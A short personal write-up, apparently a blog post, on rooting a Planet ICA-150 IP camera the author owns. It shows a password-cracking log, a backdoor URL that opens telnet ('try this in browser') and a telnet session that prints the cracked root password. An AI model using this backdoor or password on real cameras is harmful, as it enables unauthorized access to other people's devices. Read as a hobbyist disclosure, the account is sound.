In autumn 2007 I bought Planet ICA-150 and discover it running on Linux. Through flaw in the web interface I get /etc/passwd file and so for curiosity I take spare machine and run John The Ripper on it. And ...
837:09:30:43 - Switching to length 8 837:09:30:43 - Expanding tables for length 8 to character count 61 837:09:30:43 - Trying length 8, fixed @3, character count 61 839:19:41:01 + Cracked root... after 839 days password was cracked.
I used John with MPI patch on Intel(R) Xeon(R) CPU 3050 @ 2.13GHz which is dual core CPU and I get ~3.5 mio/s DES keys. After 839 days John tried 253 713 600 000 000 hashes from 281 474 976 710 656 (2^48) total. So ~90% key space searched.
Camera have nice backdoor for opening telnet daemon, try this in browser:
http://CAM-IP/adm/file.cgi?todo=inject_inetd_wineAnd you get: Open Telnet Daemon successfully! So now you can telnet on it.
[root@server ~]# telnet cam Trying 192.168.1.2... Connected to cam. Escape character is '^]'. PL010203 login: root Password: 2xVpIAk6 root login on `ttya0' ASH is running #Mission done.
Create custom firmware would be faster but no firmware for ICA-150 was released and simply run John is not 'eating my time' task. And of course, I do not really need root access on my camera, but I like possibilities :-)